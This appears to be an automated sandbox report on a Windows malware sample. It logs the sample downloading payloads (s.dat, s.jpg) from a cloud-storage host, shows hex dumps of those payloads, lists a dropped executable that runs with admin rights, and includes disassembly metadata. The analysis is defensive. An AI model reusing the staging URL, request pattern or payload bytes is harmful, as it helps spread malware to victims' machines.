2025-01-01 07:24:33 UTC	4096	IN	Data Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50006	39.103.20.97	443	6808	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:24:42 UTC	111	OUT	GET /s.dat HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:24:43 UTC	561	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:24:42 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 6774EDBA1253C532335A0265 Accept-Ranges: bytes ETag: "5DA2677B3A6324F426E10B98DD937BD2" Last-Modified: Wed, 01 Jan 2025 07:24:17 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10628867450585619515 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: XaJnezpjJPQm4QuY3ZN70g== x-oss-server-time: 18
2025-01-01 07:24:43 UTC	3535	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-01 07:24:43 UTC	4096	IN	Data Raw: 23 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 Data Ascii: #_##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-01 07:24:43 UTC	4096	IN	Data Raw: 8e 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2025-01-01 07:24:43 UTC	4096	IN	Data Raw: 38 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f Data Ascii: 80JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKS
2025-01-01 07:24:43 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-01 07:24:43 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-01 07:24:43 UTC	4096	IN	Data Raw: 67 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed Data Ascii: gG<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-01 07:24:43 UTC	161	IN	Data Raw: 27 bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 75 af 7b 14 Data Ascii: 'VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSu{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50008	39.103.20.97	443	6808	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:24:44 UTC	111	OUT	GET /s.jpg HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:24:44 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:24:44 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 6774EDBCF06ABA3338951E52 Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Tue, 31 Dec 2024 10:00:05 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 3
2025-01-01 07:24:44 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-01 07:24:44 UTC	4096	IN	Data Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2025-01-01 07:24:44 UTC	650	IN	Data Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Target ID:	0
Start time:	02:22:59
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\0000000000000000.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\0000000000000000.exe"
Imagebase:	0x140000000
File size:	31'322'802 bytes
MD5 hash:	4082E7B105C3E8ADFA454F1B09890A2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:24:44
Start date:	01/01/2025
Path:	C:\Users\user\Documents\Y1mbCC.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\Y1mbCC.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:24:44
Start date:	01/01/2025
Path:	C:\Users\user\Documents\Y1mbCC.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\Y1mbCC.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:25:01
Start date:	01/01/2025
Path:	C:\Users\user\Documents\Y1mbCC.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\Y1mbCC.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.3%
Total number of Nodes:	458
Total number of Limit Nodes:	10

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006D6C
@, xrefs: 0000000140006FA2

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

t, xrefs: 0000000140005ED1
M, xrefs: 0000000140005E99
d, xrefs: 0000000140005F7D
L, xrefs: 0000000140005EB9
l, xrefs: 0000000140005F87
m, xrefs: 0000000140005F91
M, xrefs: 0000000140005EA9
r, xrefs: 0000000140005F6E
a, xrefs: 0000000140005EE9
c, xrefs: 0000000140005FAA
i, xrefs: 0000000140005EC1
l, xrefs: 0000000140005FA0
., xrefs: 0000000140005F78
s, xrefs: 0000000140005F5F
s, xrefs: 0000000140005EA1
o, xrefs: 0000000140005FA5
s, xrefs: 0000000140005EC9
l, xrefs: 0000000140005F82
c, xrefs: 0000000140005F69
t, xrefs: 0000000140005EF1
p, xrefs: 0000000140005EB1
d, xrefs: 0000000140005EE1
., xrefs: 0000000140005ED9
v, xrefs: 0000000140005F64
t, xrefs: 0000000140005F73
l, xrefs: 0000000140005F9B
a, xrefs: 0000000140005F96
m, xrefs: 0000000140005F5A

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFE11EC1C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE11EC1C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE11EC1C7A
_RTC_Initialize.LIBCMT ref: 00007FFE11EC1CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE11EC1CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFE11EC1CF9

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: b755765626ad78c2a8d38381581d8c1c731f1b4e65f25f5443dd13577d3b0784
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: A481A421E0CE4386FB58ABE79C4137B2698AF45BA0F8490B5E94D477B6DE3CF4458710

Function 00007FFE11EC1720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFE11EC1753
FreeLibrary.KERNEL32 ref: 00007FFE11EC1981

Part of subcall function 00007FFE11EC1B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE11EC1BC0
Part of subcall function 00007FFE11EC1B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE11EC1BC6

Part of subcall function 00007FFE11EC1720: FindFirstFileA.KERNELBASE ref: 00007FFE11EC1536

Strings

WordpadFilter.db, xrefs: 00007FFE11EC1527

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 3ebd68c927d512f0d99138d231201c252c8b942891359cca48897c038c30ed9c
